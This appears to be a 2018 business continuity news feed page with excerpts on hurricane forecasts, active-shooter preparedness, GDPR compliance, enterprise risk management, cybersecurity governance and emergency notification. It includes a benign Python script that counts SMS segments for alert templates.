(TNS) — You never think it will happen to you.

You’ve gone to school or a festival, concert venue or shopping mall for years and have never had any concerns. Then, one day, gunshots ring out, and they seem to be getting closer and closer.

Quick thinking and being prepared can make the difference between being a survivor or victim — for you, your family, friends or others, local health and emergency personnel said.

“The reality is it can happen anywhere,” Dr. Deborah McMahan, health commissioner for the Fort Wayne-Allen County Department of Health, said Friday, referring to the shooting a day earlier that left five people dead in the newsroom of the Capital Gazette newspaper in Annapolis, Md.

McMahan was speaking Friday at a previously scheduled information session for media about how to react in an active-shooter situation and how to help stop the bleeding of people who have been wounded.

The goal of the demonstration is to get the information to you — the public — so you can be prepared to save your life or the lives of others.



In a typical year, the U.S. experiences 12 named storms, six hurricanes, and three major hurricanes.

“Typical,” however, doesn’t describe our last season.

In 2017, there were 17 named storms, 10 hurricanes, and six major hurricanes. NOAA attributes the irregularity to "the lack of El Niño conditions in the equatorial Pacific, with La Niña conditions developing near the end of the season."

Experts don’t expect the 2018 season to fare much better.

Companies in the danger zone are reasonably on edge and the rest of the country should be equally concerned. While coastal areas are in the bullseye, states nationwide feel the economic impact of hurricanes.



Tuesday, 03 July 2018 16:23

By Phil Klotzbach, lead author of the Colorado State University (CSU) hurricane forecasting team, and I.I.I. non-resident scholar.

Colorado State University (CSU) released its updated outlook for the 2018 Atlantic hurricane season today, and they are now calling for a below-normal season with a total of 11 named storms (including Alberto, which formed in May), four hurricanes and one major hurricane (maximum sustained winds of 111 miles per hour or greater; Category 3-5 on the Saffir-Simpson Wind Scale) (Figure 1).  This prediction is a considerable reduction from their June outlook, which called for 14 named storms, six hurricanes and two major hurricanes.  Accumulated Cyclone Energy (ACE) and Net Tropical Cyclone (NTC) activity are integrated metrics that take into account the frequency, intensity and duration of storms.



Using Tech to Streamline Compliance Efforts

Data collection and monitoring tools now make it easier to access information quickly, but only if your company has the right content management and e-communications system in place. Rather than leaving the decision as to what system would work best solely up to the IT department, compliance officers should have a say in the functionality of such systems, given the time and resources involved in following compliance protocols and e-discovery searches arising from compliance audits, internal investigations and regulatory investigations.

When the alarm goes off, your general counsel and regulatory compliance team put the IT department on high alert: find all institutional content related to a specific issue or event, and find it fast.

Perhaps the request is in response to a claim alleging a product defect, with all documents related to product design and testing needing to be collected, including blueprints, design specs, patent applications, emails and texts between designers and outside contractors and subcontractors, as well as beta testing results. Or the request relates to alleged insider trading, employee harassment, illegal payments to a foreign partner or leaking of clinical trial results.

When these requests come to an IT department, resources must be pulled from other projects and the team has to search the company’s cloud or network of files, and in some cases, depending on where information was saved, obtain laptops from their users so individual hard drives can be reviewed. The team also might need to recall where deleted emails are stored, identify the search parameters to gather the relevant ones and determine what to do with data from users who have left the firm or work from overseas offices, which may have conflicting privacy and e-discovery rules governing the accessing and downloading of information. And perhaps more challenging is that IT staff may suddenly be exposed to sensitive, confidential information, if only to capture and manage it.



Monday, 02 July 2018 16:19

The Data Collection 'Fire Drill'

Surefire Tips to a Speedy Exit

Plenty of paths lead to firing, and lackluster (or even poor) performance isn’t the fastest by any means. Linda Henman outlines some of the more egregious ways you can bring about a quick end to a good job.

Almost every year, a senior person in one of my client companies gets fired. Sometimes I’m surprised to learn of the firing, but, more often, I’d spotted troubling behavior years before.

When the leaders or board directors must fire a senior person, the company suffers financially — often to the tune of a million dollars, but one recent firing cost the company $50 million. When these firings occur, investors and donors lose confidence, morale plummets and the company’s reputation deteriorates.

The following list represents actual people and real cases — people who seemingly wanted to get fired. Here’s the advice they apparently followed:



Monday, 02 July 2018 16:17

The 10 Best Ways To Get Yourself Fired

Unlike other essential utilities, water supply is often overlooked by UK business continuity managers because it is frequently viewed as a supplier responsibility. Many organizations are not aware that non-household customers should arrange and maintain their own contingency plans especially when they are considered a ‘sensitive’ or ‘water critical’ site.

In this article, Sven Parris, senior sales & marketing manager at Water Direct, talks about water contingency planning for UK businesses and organizations and the importance of improving resilience and raising the profile of water as a critical business continuity theme.

In April 2017, the water market changed, meaning non-household customers can now choose their water provider, creating an open market for new water retailers. Water wholesalers still manage the infrastructure: supply, pipes and sewage works, while the newly established retailers manage the customer service, billing and value-added services. This has introduced new opportunities for competitive pricing, collated billing for multi-site businesses and new value-added services designed to differentiate the suppliers. The change in the market has also brought to the surface the importance of these business customers having their own contingency plans for water supply.



Business continuity has a defined role within cyber resilience strategies, and it has become intertwined with cyber security for threats requiring coordinated responses across organizations’ departments.

This is one of the key findings of the 2018 Cyber Resilience Report, published today by the Business Continuity Institute, in collaboration with Sungard Availability Services.

Since the first publication of this report we have witnessed an increase in the number of cyber-attacks and the development of new cyber threats with the potential to cause major damage to organizations, including severe financial and reputational impacts at a scale that threatens their very existence.

The financial cost of cyber-attacks is growing. This is not a surprising result after the events that occurred last year, when large-scale cyber-attacks cost organizations worldwide millions of euros. Reputational damage is also of major concern: 66% of respondents consider reputational damage the most concerning trend when it comes to cyber security incidents.

Moreover, cyber security incidents cannot be considered exclusively non-physical incidents anymore. 46% of respondents consider cyber-attacks with physical security consequences as one of the concerning trends.

The cyber threat landscape today is highly complex and rapidly changing and it has become clear that business continuity plays a key role in responding to an incident and ensuring that the organization is able to manage any disruption and prevent it from becoming a crisis.

According to this year’s results, business continuity remains key to building cyber resilience and there is the need for it to collaborate with cyber/information security departments to improve the way organizations deal with disruptions caused by cyber security incidents.

David Thorp, Executive Director at the BCI, commented: “The best way to protect organizations from one of the greatest threats of our times is to invest in people and preparedness. Investing in training and collaborative strategies should be at the heart of any plans aimed at mitigating cyber-attacks and ensuring a fast recovery.”

The 2018 BCI Cyber Resilience Report is now available for download. Log in to your profile and visit the knowledge library.


Enterprise risk management is often criticized as being remote from the real strategic needs of the organization. Is this fair comment and, if so, what can be changed to make ERM more relevant? Peadar Duffy gives his viewpoint.

I recently spent a couple of hours talking with the senior independent director of a major FTSE-listed company. He opined that in his experience, risk management consistently fails to deliver value. It is led by people who are more administrators than leaders, and more bureaucrats than doers. The director in question has himself been a spectacularly successful CXO in a number of significant organizations.

Around the same time another senior executive with impressive credentials remarked that in his experience 'risk has been done to him' by folk in risk management. He speaks of the parallel universes of the operational front lines, risk support, and audit. Whereas the theory and rationale (three lines of defence) is sound, the method of execution is often sub-optimal, and sometimes even counter-productive.

I am sympathetic to these perspectives, as I think that whilst harsh, they are representative of generally held opinions of many in both front line decision making, and strategic leadership positions.



Earlier in June ISO published ISO 22330, its latest business continuity standard. In this article, Dr Liz Royle explains what the new standard is, why it was needed, and what it contains.

A fire has ripped through the building. Although most people were successfully evacuated and sheltered, some remain unaccounted for and there may be fatalities. In the ensuing hours, people are shocked and distressed, rumours are rife about the cause and impact of the fire and the management team is working flat out to respond. Would you be ready to effectively manage the people aspects of this event?

It’s in everyone’s interests for the organization to recover quickly and its people are at the heart of this. However, it’s no good having arrangements for relocating operations if the people sitting in those alternative worksites are not able to function as usual, are emotionally distressed or angry about how the organization dealt with them, their families or their colleagues.

People may become negatively impacted by a wide variety of work-based incidents – fire, natural disaster, cyber-attacks, workplace violence or acts of terror commonly spring to mind. The event may affect the whole organization, a department, team or a few individuals. However, when it comes to managing the people aspects, there are basic principles that apply whatever the causal event or however many people we are managing. The long-awaited ISO 22330 ‘Guidelines for people aspects of business continuity’ was published at the beginning of June so this article offers a ‘hot off the press’ review and some ideas of how and why you might use it.



Few things embody the task of balancing risk and reward like a manned space rocket sitting on the launchpad as the moment of liftoff approaches. Such a rocket brings together in one time and place all the hopes and objectives for the mission as well as all the risks it carries—risks which, as history shows, are very real.

I always felt a special rooting interest in NASA’s manned space missions because my brother works for the space agency. He’s a fire chief at NASA’s White Sands Test Facility in New Mexico.

But if NASA is an especially good example of the need to balance risk and reward in carrying out a mission, it is not the only organization in that position. Every serious organization is in that situation. All are striving to achieve certain goals in an environment filled with potential dangers, whether caused by nature, technology, or human beings.

The discipline of balancing the potential rewards of an activity against the risks it brings is known as Enterprise Risk Management (ERM).



As you know, a leading trend of the past several years is organizations’ hiring third-party vendors to provide services that they previously performed in-house.

At MHA, we are familiar with this trend from helping our clients grapple with the ramifications of it from a business continuity (BC) point of view.

There are many reasons for the increasing turn to outside vendors. Mostly it comes down to businesses’ desire to outsource tasks not central to their core skillset so they can focus on those that are.

For most companies, such outsourcing has been found to reduce expenses, increase flexibility, and heighten service quality—while permitting the organization to maintain a laser focus on what it does best (and what is most profitable).



For the second year in a row, AlertMedia has been named one of the Best Places to Work by the Austin Business Journal. Last year, we finished in 5th Place in the Small Business category. After a year of rapid growth and increased fundraising, we moved to the Medium category this year, where we were named the 3rd best workplace for 2018!

The award recognizes the top workplaces in Austin across many industries—from technology to real estate to education. The rankings are based on confidential feedback from employees across several dimensions, including communication, resources, manager effectiveness, personal engagement, team dynamics, and trust in leadership.



When shopping for mass notification systems, there are more options than most people realize, and it can be time-consuming to vet them all.

By identifying the basic features you need in a good notification system, you can go into the process with a clear vision of your goals.  Read on for a buyer’s guide to finding the best mass notification solution for your agency.

Best for the Community

Your end goal with a mass notification system is to be able to protect your community. So it only makes sense to start by thinking about your most important audience – the people out there who need information in an emergency.

Will they need all the bells and whistles that are featured in some emergency notification systems? Do other organizations in the community already provide some high-quality notifications for emergencies? Can you successfully implement a notification solution that only includes basic functions?



Over the years I’ve heard the same question, “What do you want to do with your life?” When I was younger, I always responded quickly, “I want to be an Astronaut.” Or, “I want to be a Movie Star.”

Now when you ask me that question, I will respond with, “I have absolutely no idea.”

My name is Angela Prass. I will be a Junior at Syracuse University this fall studying Information Management and Technology. Recently, I received an internship opportunity at BC in the Cloud, along with two other talented individuals.

Along my long journey in college of not knowing what to do for the rest of my life, I stumbled upon a class titled, “Enterprise Risk Management.” I received a good grade in this class and wanted to explore this concept on a real-world scale. I thought to myself, “I like to take risks. This is something I’d be interested in.”



Do you know how, in your non-business life, there is a difference between “friends” and “Facebook friends”?

There is something similar in business continuity when it comes to third-party vendors.

Your organization might purchase goods and services from 500 outside companies, but how many of these do you really depend on? How many are vital to your company’s ability to carry out its core mission?

If your organization is like most I work with, the answer might be about a dozen.

Can you guess why I’m mentioning this, or why it matters?

Of the main business continuity dimensions, one is by far the most neglected. Do you know which one?

If you answered Program Administration, Crisis Management, IT Disaster Recovery, Business Recovery, or Fire and Life Safety, you’re wrong, I’m sorry to say.



A national survey of more than 1,127 adults found that slightly more than half (51 percent) believed it was very likely or somewhat likely that a disaster could impact them in the next five years, but most (53 percent) indicated they don’t have emergency plans in place and couldn’t go more than just a few days without medication.

The survey was the third annual for Healthcare Ready, which was established after Hurricane Katrina by trade associations composed of the bio-pharmaceutical supply chain and the American Red Cross.

“It shocked me that we saw half of the respondents say that they thought a catastrophe could impact their community in the next five years,” said Healthcare Ready Executive Director Nicolette Louissaint. “But the preparedness numbers have not shifted significantly in the last three years since we’ve been doing the poll.”



How to Achieve Compliance

Greg Sparrow addresses the issues of the General Data Protection Regulation (GDPR) and preventative actions that must be taken to ensure organizational compliance. Through a “GDPR Readiness Survey” sponsored by CompliancePoint, Greg touches on the research findings and draws probability conclusions.

The General Data Protection Regulation (GDPR) is an EU regulation that requires businesses to protect the personal data and privacy of natural persons in the European Union, including when processing takes place within EU member states. Data protected under the GDPR includes identifying information (names, addresses, dates of birth), web-based data, health and genetic data and biometric data. The regulation became enforceable on May 25, 2018 and applies to all businesses that interact with, or market to, EU data subjects. The GDPR rests on the premise that personal information is, or should be, private and that individuals have rights over that data; the regulation’s own text describes data protection as a fundamental right.

Despite the two-year transition period that companies were given to prepare for GDPR compliance after the regulation was approved in 2016, a recent survey titled “GDPR Readiness Survey” shows that very few are 100 percent compliant. The survey found that only 29 percent of the participants were fully aware of the GDPR, 44 percent said they were somewhat aware and 29 percent said they were completely unaware. The survey also found that only 24 percent of businesses felt they were prepared for the GDPR, and 31 percent felt they were somewhat prepared, compared with 36 percent that said they did not feel prepared and another 9 percent that said they were unsure. These numbers are alarming because a single infraction can cost a noncompliant business millions. Companies that are not fully aware or fully prepared face considerable risk when working with any customers who may be based in the EU.



(TNS) - The approach to wildfire suppression in Kansas suffers from leadership fragmentation and the lack of financial resources and personnel to effectively coordinate response to massive blazes churning across the prairie, a legislative audit said Wednesday.

The examination was ordered after Kansas suffered record wildfires in 2016 and 2017 that burned a total of 800,000 acres, caused $80 million in damage, destroyed 6,000 miles of fencing, and killed one person and about 5,000 cattle.

Andy Brienzo, an auditor with the Kansas Legislature's auditing division, said the state's program to control wildfires generally fell short of centralized operations in Texas and three other states. He said Kansas' operation was inadequate to meet demand for emergency services, and this shortfall meant local government was compelled to absorb more of the cost than in comparable states.



(TNS) - As temperatures creep into the upper 90s and it feels like it is 110 outside, many are retreating to the indoors, but others have to bear the heat for their work.

Emergency responders are on the front line to help people. To do that job, some of them carry up to 60 pounds of equipment during extreme temperatures.

"Most firefighters carry between 50 and 60 pounds of equipment and when you add the sweat on it, it gains weight," Director of Cleveland County Emergency Management Perry Davis said.

At a fire on Phifer Circle Monday, a dozen firefighters swapped in and out fighting the blaze to make sure they didn't put themselves in danger.



Organizations of all sizes are increasingly turning to third-party vendors to handle tasks which would formerly have been performed in-house. Such tasks can range from payroll and accounting to email to presentation and meeting software.

In handing these tasks over to third-party suppliers, organizations are also passing along the obligation to provide business continuity (BC) and recovery capability for the services they provide—a responsibility they are generally glad to get off their plates.

From the BC perspective, there is nothing inherently wrong with an organization turning to outside vendors to meet their needs. However, too often organizations take the approach of “out of sight, out of mind” with their third-party vendors, and in doing so they are running a considerable risk.

Third-party suppliers have the potential of being an Achilles’ heel for your organization, meaning they are a small area of vulnerability that could potentially cause a significant amount of damage.



The Technology Disrupting the Health Care Industry

Blockchain tech is disrupting multiple industries, and perhaps none more so than health care. Organizations using the technology for medical records point to tamper-evidence and integrity as the benefit; note that a ledger alone provides no confidentiality, so the records themselves still need encryption and access control. Another noteworthy advantage claimed is unprecedented data portability.

We’re living in a crypto, bitcoiny, blockchainy world that’s spinning out disruptions faster than McDonald’s serves Big Macs.

They say the first real-world Bitcoin purchase was 10,000 bitcoins for two pizzas. Now, 6 bitcoins buys you a sports car. Man, were those costly pizzas back then!

Ever notice those odd, locking vertical boxes in doctor’s offices? Sometimes you’ll see them located behind where the receptionist sits? Or perhaps they’ll be in a room all by themselves.

They’re known as file cabinets, circa 2017, which were once places for storing sensitive and important information, such as our medical records.

Today those cabinets are dinosaurs. They’re rapidly being replaced by a disruptive new way of storing and accessing medical records based on an entirely new platform made possible today by blockchain technology.



Thursday, 21 June 2018 15:21

Doctor Blockchain Will See You Now

Developing a community’s confidence in an opt-in emergency notification system is essential to success, but not having complete buy-in from the users of the system can slow its development as well.

Ottawa County, Mich., emergency management and first responders faced both of those when they implemented the Smart911 system, developed by Rave, in 2014. But momentum seems to be picking up with public safety and emergency management personnel solidly behind the system and the public headed in that direction too.

Just under 5,000 residents have signed on to the system, but last week more than 200 signed up in a 24-hour period, which was “great progress,” according to the county’s Emergency Management Director Nick Bonstell.



For some businesses, the hybrid storage array offers the best of both worlds. In comparison to the all-flash array – clearly the highest performance option – a hybrid array allows a lower cost, yet also enables some impressive performance. It's the classic "transitional" storage solution as flash becomes ever more dominant in storage infrastructures, yet hard disk drives remain abundant.

Yet for all its advantages, a hybrid storage array isn't the automatic choice. Let's explore the hybrid vs. all-flash array question.



(TNS) - Apps such as Uber, “Pokemon Go” and Snapchat can pinpoint where users are down to the side of a block. But 911 dispatchers have to rely on distant cell towers, sometimes-faulty GPS and the caller — who is likely in distress — to figure out where calls are coming from.

In an effort to thrust 911 call centers into the 21st century, Apple announced Monday that the next major update to iPhone software will allow users in the U.S. to automatically share location data with emergency responders. Software and a data clearinghouse built by New York startup RapidSOS will let 911 centers receive callers’ locations.



(TNS) - Always ready. Always there.

That’s the motto of the National Guard, and for 48 days — and counting — soldiers and airmen from this component of the military have been doing safety and relief work amid volcanic threats and destruction on the east side of Hawaii island.

More than 200 Guardsmen have been assisting Hawaii County Civil Defense with jobs that include monitoring dangerous gas emissions from lava flows, manning security checkpoints, building emergency housing and conducting search-and-rescue missions.

Many of these servicemen and women are volunteers and are from around the state, including some who live on the active volcanoes that make up the Big Island and never imagined they would be responding to a lava eruption disaster in their own community.



According to hurricane research scientists at Colorado State University, the 2018 hurricane season is set to be slightly above average in activity.

Thankfully that’s better than the 2017 season, which cost more than $282 billion and caused up to 4,770 fatalities.  Whether we see two named storms or ten, preparation is your greatest ally against potential devastation.  Start by using these automated message templates for your organization’s mass notification system.

Using Hurricane Notification Message Templates

When using message templates, there are a few basic guidelines to follow. Start by keeping the message length to a minimum. This ensures recipients can get the most information in the least amount of time. In addition, a single SMS holds only 160 characters (70 if the text contains characters outside the GSM-7 alphabet, such as curly quotes or emoji); longer text is split into concatenated segments, and many gateways cap a message at 918 characters (six segments). A long alert therefore arrives as several separate texts, which may create confusion.

By creating message templates prior to severe weather, you can generate detailed and informative alerts for every step in your emergency plan. Then in the wake of a hurricane, these messages are ready to be sent to the right audiences. Recipients receive only those messages that apply to them, which helps to eliminate confusion during a stressful time.
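As an added example that is not part of the original article or of any vendor’s product, the following Python checks a filled-in hurricane template the way an SMS gateway would: it decides whether the text fits the GSM-7 alphabet, counts the 160/153- or 70/67-character segments it will occupy, and warns when the result exceeds the 918-character limit the article cites. The 918 cap, the `${name}`-style placeholders and the sample templates are assumptions made for this example; the GSM 03.38 character tables and the per-segment limits are standard.

```python
"""Segment counter for SMS notification templates.

Added example, not from the original article or any notification vendor.
GSM 03.38 tables and the 160/153 and 70/67 segment sizes are standard; the
918-character gateway cap (six GSM-7 segments) is the figure the article cites.
"""
from string import Template

# GSM 03.38 basic character set: each character costs one septet.
GSM7_BASIC = set(
    "@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞÆæßÉ !\"#¤%&'()*+,-./0123456789:;<=>?"
    "¡ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÑÜ§¿abcdefghijklmnopqrstuvwxyzäöñüà"
)
# GSM 03.38 extension table: each character costs two septets (escape + char).
GSM7_EXTENDED = set("^{}\\[~]|€")

MAX_CHARS = 918  # assumed gateway cap: six concatenated GSM-7 segments


def gsm7_septets(text):
    """Return the septet count if text is GSM-7 encodable, else None.

    Approximation: an extension escape pair that straddles a segment boundary
    is not pushed into the next segment, so the count can be one septet low.
    """
    total = 0
    for ch in text:
        if ch in GSM7_BASIC:
            total += 1
        elif ch in GSM7_EXTENDED:
            total += 2
        else:
            return None  # falls back to UCS-2
    return total


def sms_segments(text):
    """Return (encoding, units, segments) for an SMS body.

    GSM-7: 160 septets in a single segment, 153 per segment when concatenated.
    UCS-2: 70 UTF-16 code units single, 67 per segment when concatenated.
    """
    septets = gsm7_septets(text)
    if septets is not None:
        enc, single, multi, units = "GSM-7", 160, 153, septets
    else:
        enc, single, multi = "UCS-2", 70, 67
        # Characters beyond the BMP (most emoji) take two UTF-16 code units.
        units = sum(2 if ord(ch) > 0xFFFF else 1 for ch in text)
    if units <= single:
        return enc, units, (1 if units else 0)
    return enc, units, -(-units // multi)  # ceiling division


def render_alert(template, **fields):
    """Fill a template and report (message, encoding, segments, warnings)."""
    message = Template(template).safe_substitute(fields)
    enc, units, segments = sms_segments(message)
    warnings = []
    if segments > 1:
        warnings.append(f"arrives as {segments} separate texts")
    if len(message) > MAX_CHARS:
        warnings.append(f"exceeds assumed {MAX_CHARS}-character gateway limit")
    if enc == "UCS-2":
        warnings.append("non-GSM character present; capacity drops to 70 per segment")
    return message, enc, segments, warnings


if __name__ == "__main__":
    # Constructed sample templates; site and storm names are placeholders.
    templates = [
        "Hurricane ${name}: ${site} closed. Stay home.",
        "Hurricane ${name} update – ${site} reopens ${when}. Check email.",  # en dash forces UCS-2
    ]
    for tpl in templates:
        msg, enc, segs, warns = render_alert(tpl, name="Alberto", site="HQ", when="Mon 8am")
        print(f"{enc} x{segs}: {msg!r} {warns}")
```

Run it before a template is approved: a template that renders to one GSM-7 segment with no warnings is what you want; a single curly quote or dash pasted from a word processor is enough to trip the UCS-2 warning and halve the capacity.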



Cybersecurity Committees on the Rise

We’re seeing a growing trend: organizations across diverse industries are beginning to establish committees dedicated specifically to cybersecurity. Some are assigning audit committees to the task, but there’s good reason in many cases to create a new committee. Whatever governance model is adopted, independent oversight is imperative.

“Cybersecurity risks pose grave threats to investors, our capital markets and our country.”

This is the opening sentence of the SEC’s Interpretive Guidance on Public Company Cybersecurity Disclosures dated February 21, 2018. While the SEC’s focus is primarily on effective disclosure controls and procedures for accurate and timely disclosures of cyber risks and material events, the magnitude of this topic has deep operating and compliance ramifications. The big question in boardrooms is who precisely should be responsible for cybersecurity oversight?

Many companies rationalize that cybersecurity oversight should reside with their audit committee since there are SEC disclosure ramifications. However, does this make sense considering that cyber risks extend well beyond financial reporting and SEC disclosures?  While there is no single correct answer considering the large array of risk environments, industries, organizational sizes and operating models, it is clear that cybersecurity committees are becoming more popular. A search of recent proxy statement filings with the SEC revealed 12 companies disclosing cybersecurity committees, five of which were created in the last year. This article sheds some light on these filings, as well as some considerations for cybersecurity governance.



Tuesday, 19 June 2018 15:51

Governing Cybersecurity

(TNS) — We find ourselves in another hurricane season, and Pender County, N.C., is preparing.

Are you? Are we all?

Pender just paid $18,000 to install a flood gauge on the N.C. 210 bridge over the Black River near Currie.

Last time we read about that section of 210, it was under water. Hurricane Matthew in 2016 swelled the Black River over its banks, less than 20 years after 1999’s Hurricane Floyd sent the Northeast Cape Fear and other rivers flowing into fields, homes and highways across Eastern North Carolina.

We commend Pender County for paying for the gauge even though, as Board of Commissioners Chairman George Brown noted, the state usually pays for those instruments.

The device is the county’s second one and is one of 560 river and coastal gauges that provide real-time water level information to warn residents who live and work nearby, as well as first responders and other emergency officials who need to know when roads are becoming impassable.



(TNS) — In the 13 years since Hurricane Katrina hit South Mississippi, much has changed.

A quick drive down U.S. 90 is a constant reminder of the past — the things that are new and that have been rebuilt and the places that are memories of life before the storm.

One of the things that changed significantly besides the landscape is technology. Facebook was in its infancy in 2005, having been launched the year before the storm, and most social media users were using MySpace. It would also be another two years before Apple released the iPhone and helped to usher in the era of smartphones and tablets.

For many Coast residents, cellphone service was spotty, at best, in the days and weeks after Hurricane Katrina. And internet service for phones was practically nonexistent.

With Colorado State University’s Tropical Meteorology Project predicting a "busy" hurricane season for 2018, which began June 1, how will cellphone service be affected in South Mississippi?



Climate change is a growing threat for national and local governments alike.

Entire communities can be devastated by extreme weather events, including hurricanes, droughts, and wildfires, each of which is exacerbated by climate change. While natural disasters themselves are a main concern for government agencies, the public may still be at risk long after a storm has passed. Debris and toxic materials can linger in the aftermath, posing potential health hazards for communities as they attempt to rebuild.

For government agencies, this means placing more focus on preparedness and response and addressing the safety of residents and staff during the recovery phase. During Hurricane Harvey in 2017, for example, the death toll continued rising even after the storm had passed. To prevent additional injuries, emergency officials must be aware of any hazards that exist in the wake of these disasters and inform the public accordingly.



Lessons From The Giant

While not every organization is a social media giant with nearly 2 billion users, like Facebook, there’s a lesson to be learned for all organizations from recent events: in today’s data-driven business environment, customer trust matters more than ever before. In this article, Gartner’s Stephanie Quaranta outlines steps privacy and compliance executives need to take in order to protect the value of their customer relationships and ultimately minimize their company’s exposure to privacy risk.

By now, the saga of Facebook and Cambridge Analytica is familiar to us all. In 2013, University of Cambridge researcher Aleksandr Kogan collected personal data from 270,000 Facebook users through a personality test app called “thisisyourdigitallife.” At the time, Facebook’s policies allowed app developers to collect data not just from users who had explicitly consented, but from those users’ friends as well. Kogan assigned test takers and their friends to psychographic segments using the collected data, then sold that information to a political consulting firm called Cambridge Analytica.

Though Facebook discovered this at the end of 2015, it chose not to alert impacted users. Instead, Facebook simply asked Cambridge Analytica to delete the data. Only in March of this year, after an exposé by The New York Times and The Observer of London reported on the data harvesting and Cambridge Analytica’s use of that information to micro-target voters in advance of the 2016 Brexit vote and US presidential election, did Facebook go public with what had happened.

The immediate backlash was fierce. Facebook stock plummeted 18% in 11 days, wiping out $80 billion in value. The hashtag #deletefacebook emerged, with Google searches on how to delete your profile more than quadrupling in the week the scandal broke. Regulators and lawmakers across the globe opened investigations into Facebook’s privacy practices.



Monday, 18 June 2018 14:52

What Happened At Facebook?

There is no better time to prepare for an economic downturn than when business is good. With the severity of the 2007–2008 financial crisis still fresh on the minds of many directors and executives, how should companies prepare for an economic downturn in the cool of the day rather than reacting in crisis mode in the heat of the moment?

At this time, most established business plans do not contemplate an economic downturn. However, some observers are forecasting a recession in the United States within the next couple of years – say, by 2020. Everyone is watching interest rates, trade, government spending, geopolitical tensions and other “tea leaves” carefully. The truth is, no one knows what the future has in store. But memories of the severity of the last downturn and its consequences for most organizations have not faded. That’s why, for most companies and their management teams and boards, a contingency plan makes good business sense, as it positions them to act decisively when recessionary storm clouds begin to loom on the horizon.

Contingency plans are certainly not new, as organizations have been developing them for a long time. Plans are documented with specific action steps that are triggered if certain harmful events occur. Such events might include natural disasters (floods, earthquakes, etc.), cybersecurity breaches, terrorist activities, fire, fraud, theft or embezzlement. Notably, these perils may never occur, but the plan stands ready nonetheless if they do. Plans are also developed to address market opportunities, should they arise.



On June 12, Advisen held a webinar entitled “Big nasty claims. What are the large loss trends in the casualty sector?” To qualify as big and nasty, the casualty claims stem from injury and/or property damage resulting from incidents such as train derailments, chemical spills and food contamination, frequently involving multiple parties, and costing $100 million or more each.

Advisen’s large loss dataset yielded some interesting insights into trends in this area, and Jim Blinn, Advisen’s moderator, was joined by two Allied World claims experts, James Minniti and Paul DeGiulio.

Advisen’s dataset reveals that pharmaceutical and medicine manufacturing, transportation equipment manufacturing, and machinery and electronics manufacturing are the top three industries involved in large claims, with public administration in fourth place.



Charlie Maclean Bristol, FBCI, FEPS, explains how you can improve your business continuity plans by altering the format and following five key steps.

When developing business continuity plans, I try to make them accessible, practical and easy to use. For a long time, I followed a traditional format, with the first few pages being filled up with scope, assumptions, objectives and the like. The problem with this format is that you have to wade through several pages before getting to the bit of the plan which would actually be used during an incident.

After a while, it occurred to me that when you make use of the plan in anger, what you don’t need to read first is a set of assumptions in the plan. By then it is a bit too late to ponder whether the assumptions are right! This is when the radical idea came to me, of putting what you need first early in the plan; and then other information and the reference material at the end. From this idea, five steps were born:



The 2018 FIFA World Cup has now started, with four weeks of football to enthuse fans across the globe. Behind the sporting glory and the celebrations, there will be a firm spotlight on the resilience not just shown by the teams, but also the wider infrastructure in place to make it all happen. Dr. Sandra Bell looks at the lessons that organizations can take from the event.

As with any global sporting event, attention always turns to the host city and its readiness to host such an occasion – everything from stadium capacity and accessibility to hospitality in the stadium is called into question. However, while the onus is currently on Russia to host a smooth and successful event, the World Cup should be seen as a catalyst for all businesses to improve the long-term resilience of both their workforce – their ‘teams’ – and their own infrastructure.

So, what lessons can businesses learn from the World Cup about readiness to be resilient?

Dealing with emerging security threats

Security threats have always been a factor for major hospitality events, but even in recent years these threats have changed both in nature and severity. FIFA has already discussed upping the security for the World Cup, with growing cyber security attacks on infrastructure becoming increasingly prevalent.

The World Economic Forum's (WEF) Global Risks Report 2018 names cyber attacks and cyber warfare as a top cause of disruption in the next five years, coming only after natural disasters and extreme weather events. In the same vein as World Cup organizers, businesses cannot just look at what has gone on before but need to constantly keep one step ahead of new threats. The nature of attacks is constantly evolving, with Internet of Things devices and critical supply chains becoming frequent targets – and no industry will be immune.

As more applications migrate to the cloud, it’s crucial that security moves further up the agenda for business leaders. Cyber threats continue to evolve, and defences will need to be a central component of any digital and business strategy to ensure you aren’t the one caught out.



Organizations are increasingly focusing on becoming resilient; that is, to be able to anticipate, adapt and respond both to incremental and sudden changes or disruptions. But while many organizations are starting to understand what these three components of organizational resilience are, few understand the need to integrate them in order to ensure resilience is actually achieved. Even fewer understand how to structure this collaboration. Philippa Chappell looks at how to achieve this.

The challenge is that while each of the three components of organizational resilience is critical, they are typically the responsibility of different role-players. The ‘anticipate’ component, which involves scoping the threat landscape and putting a risk strategy in place, is handled by the enterprise risk management department. ‘Adapt’, which focuses on operational resilience, would be governed by the COO and the business units concerned. ‘Response’ is addressed by the business continuity manager and covered by the business continuity plan.

In dealing with any threat, it is vital that each of these areas works closely with the others. For example, in the case of a cyber attack, it is vital that the organization knows what cyber risks it faces: what confidential information and intellectual property are held in its systems, and what controls are in place. The risk management team would need to collaborate with IT in this case, and the results of its work would inform the actions taken by the operations team. The latter would have to consider the vulnerabilities and identify any single points of failure, such as a central legacy system on which all other systems depend. It would also have to put contingency plans in place in the event of an attack.

Clearly, for maximum organizational resilience, these role-players must collaborate across the whole process.



Recently I was walking through the airport, I was in a hurry, of course, and I was running late for my flight. I had my backpack on, my left hand pulling my carry-on, and my phone in the right hand. For productivity purposes I was walking, reading, responding to emails, and then BOOM! – someone walked right into me. OK maybe I walked into them, I’m not certain. Thankfully we both were OK, courteous, and we apologized simultaneously. Both of us were not paying attention, we had weak peripheral vision, and very poor Situational Awareness. My lesson was learned. I am not going to be using my phone in any way while walking anywhere any more. Just like I don’t touch my phone at all while driving my car. OK maybe I take a quick glance at my Waze App, but I should stop doing that too. It’s better to take a wrong turn and get lost than to get into an accident. Right? I mean come on, I am in the business of risk mitigation.

In today’s world, we always must be cognizant of Situational Awareness. Situational Awareness or situation awareness (SA) is the perception of environmental elements and events with respect to time or space, the comprehension of their meaning, and the projection of their status after some variable has changed. SA is also a field of study concerned with understanding the environment critical to decision-makers in complex, dynamic areas from aviation, air traffic control, military, police, and firefighting. Heck it’s incorporated into our Incident Management component and maps within BC in the Cloud. Situational awareness also covers the more ordinary but nevertheless complex tasks such as driving a car, riding a bike, sports, or just walking through the airport. Someone smart once said ‘Common Sense is not so Common’. Some say that quote came from Voltaire, some say it was Mark Twain AKA Samuel Clemens. Anyways, it is such a true statement, and that’s probably a huge reason why we all have jobs in this industry.



Monday, 18 June 2018 14:44

Situational Awareness

Do you wear your seatbelt when driving or riding in a car?

